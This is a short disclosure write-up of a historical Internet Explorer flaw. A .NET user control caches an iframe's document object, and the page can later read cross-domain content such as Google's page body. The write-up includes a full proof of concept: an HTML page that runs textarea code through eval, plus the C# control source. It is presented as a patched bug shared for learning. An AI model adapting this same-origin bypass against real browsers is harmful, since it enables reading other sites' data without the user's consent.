userControl Cached Document UXSS

A .NET user control hosted in IE can store a reference to an IFRAME’s document object. After the IFRAME navigates to a different domain, the stored reference remains valid and bypasses all same-origin checks — because the security check happens at the time of access, not at the time of storage, and the .NET layer doesn’t re-evaluate the origin when the stored object is returned.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>userControlCachedDocumentXDomain</title></head>
<body style="visibility:hidden;" onload="document.body.style.visibility='visible';">
<font face="Tahoma" size="2">
<center>
<h1>userControl Cached Document XDomain</h1>
</center>
1) Copy a reference (cache) of the <b>iframe document</b> inside a .Net userControl.<br />
2) Change the iframe URL.<br />
3) Retrieve the document from the .net userControl and access with no domain restrictions.<br />
<br />
<center>
<b>Double Click inside the textArea to run the code.</b><br />
<textarea tabindex="2" id="textAreaCode" ondblclick="eval(this.value);" style="width:600px;height:90px;font-family: Tahoma, Arial, Helvetica, sans-serif; font-size:12px;">
myApplet.SetObject(xDomainIframe.document);

xDomainIframe.location = "http://www.google.com";

setTimeout('alert(myApplet.GetObject().body.innerHTML)',5000);
</textarea>
</font>
<object id="myApplet" classid="http:MyApplet.dll#AppStart" width="200" height="200"></object>
<iframe name="xDomainIframe" width="400" height="200"></iframe>
</center>
</body>
</html>

MyApplet.cs (.NET user control source):

using System;
using System.Drawing;
using System.Windows.Forms;
using mshtml;

public class AppStart : Control
{
    public HTMLDocument myHTMLDocument;

    public HTMLDocument GetObject()
    {
        return myHTMLDocument;
    }
    public HTMLDocument SetObject(HTMLDocument myObject)
    {
        myHTMLDocument = myObject;
        return myObject;
    }
    protected override void OnPaint(PaintEventArgs e)
    {
        e.Graphics.FillRectangle(new SolidBrush(Color.Coral), ClientRectangle);
    }
    [STAThread]
    public static void Main(string[] m)
    {
        AppStart myAppStart = new AppStart();
        myAppStart.Dock = DockStyle.Fill;
    }
}

The .NET control stores an HTMLDocument COM pointer. When the IFRAME navigates to Google, IE’s security model would normally block access to that document from the original domain’s script — but the .NET control acts as a trusted intermediary that returns the pointer without performing an origin check. Five seconds later, GetObject().body.innerHTML reads Google’s DOM without any error.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.